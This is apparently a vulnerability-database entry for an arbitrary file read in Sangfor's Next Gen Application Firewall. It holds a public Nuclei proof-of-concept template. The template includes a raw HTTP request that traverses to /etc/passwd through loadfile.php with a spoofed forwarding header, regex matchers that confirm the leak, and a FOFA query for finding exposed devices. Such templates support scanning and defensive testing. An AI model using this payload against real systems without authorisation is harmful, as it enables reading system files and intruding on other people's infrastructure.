sangfor-nextgen-lfi: Sangfor Next Gen Application Firewall - Arbitrary File Read

Date: 2025-08-01 | Affected software: Sangfor Next Gen Application Firewall | PoC: public

Vulnerability description

Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter.

PoC code [public]

id: sangfor-nextgen-lfi

info:
  name: Sangfor Next Gen Application Firewall - Arbitary File Read
  author: DhiyaneshDk
  severity: high
  description: |
    Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter.
  reference:
    - https://labs.watchtowr.com/yet-more-unauth-remote-command-execution-vulns-in-firewalls-sangfor-edition/
  classification:
    cpe: cpe:2.3:a:sangfor:next-gen_application_firewall:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sangfor
    product: next-gen_application_firewall
    fofa-query: title="SANGFOR | NGAF"
  tags: sangfor,lfi,vuln

http:
  - raw:
      - |
        GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
        Host: {{Hostname}}
        y-forwarded-for: 127.0.0.1

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

      - type: word
        part: header
        words:
          - 'filename="passwd"'
          - 'application/octet-stream'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402204413515627824bb4032b1ee77a78a3d6758e78b56e619e7408ce4486d7013a0202200e02f7872f2e3a3e4a1ac4c678f56ba41bfd18c50ad2c9af543ef89f470f91b2:922c64590222798bb761d5b6d8e72950
